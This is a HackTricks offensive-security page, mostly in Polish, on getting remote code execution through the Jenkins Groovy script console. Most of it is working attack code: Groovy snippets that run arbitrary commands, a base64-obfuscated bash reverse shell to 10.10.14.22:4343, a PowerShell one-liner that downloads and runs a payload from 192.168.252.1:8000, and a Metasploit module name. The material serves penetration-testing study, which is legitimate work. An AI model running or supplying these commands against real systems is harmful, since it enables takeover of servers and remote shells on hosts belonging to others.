Jenkins RCE with Groovy Script

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Jenkins RCE with Groovy Script

To jest mniej hałaśliwe niż tworzenie nowego projektu w Jenkins

  1. Przejdź do path_jenkins/script

  2. Wprowadź skrypt w polu tekstowym

def process = "PowerShell.exe <WHATEVER>".execute()
println "Found text ${process.text}"

Możesz wykonać polecenie używając: cmd.exe /c dir

W linux możesz zrobić: "ls /".execute().text

Jeśli musisz użyć cudzysłowów i pojedynczych cudzysłowów wewnątrz tekstu. Możesz użyć """PAYLOAD""" (potrójne podwójne cudzysłowy), aby wykonać ładunek.

Inny przydatny skrypt groovy to (zamień [INSERT COMMAND]):

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '[INSERT COMMAND]'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

Odwrócona powłoka w systemie Linux

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

Reverse shell w Windows

Możesz przygotować serwer HTTP z PS reverse shell i użyć Jekinsa do pobrania i wykonania go:

scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')"
echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc <BASE64>

Script

Możesz zautomatyzować ten proces za pomocą tego skryptu.

Możesz użyć MSF, aby uzyskać powrotną powłokę:

msf> use exploit/multi/http/jenkins_script_console

Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Wsparcie HackTricks

Last updated